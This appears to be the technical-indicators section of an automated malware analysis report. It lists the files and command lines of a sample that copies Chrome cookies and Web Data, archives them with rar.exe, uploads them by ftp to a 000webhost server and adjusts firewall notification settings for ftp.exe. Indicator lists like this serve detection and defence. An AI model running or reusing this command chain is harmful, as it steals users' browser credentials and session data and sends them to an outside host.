Technical Information
- %TEMP%\84dd.tmp\84ed.bat
- <SYSTEM32>\rar.exe
- C:\cookies\user\cookies
- C:\cookies\user\web data
- C:\cookies\user\web data-journal
- C:\cookies\user\user.rar
- C:\cookies\user\ftpcmd.dat
- 'fi###.#00webhost.com':21
- DNS ASK fi###.#00webhost.com
- '<SYSTEM32>\rar.exe' a user
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\84DD.tmp\84ED.bat <Full path to file>"
- '<SYSTEM32>\xcopy.exe' "%ProgramFiles%\WinRAR\Rar.exe" "<SYSTEM32>"
- '<SYSTEM32>\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Default\cookies" "C:\Cookies\"user
- '<SYSTEM32>\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Data" "C:\Cookies\"user
- '<SYSTEM32>\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Data-journal" "C:\Cookies\"user
- '<SYSTEM32>\ftp.exe' -n -s:ftpcmd.dat files.000webhost.com
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "<SYSTEM32>\ftp.exe"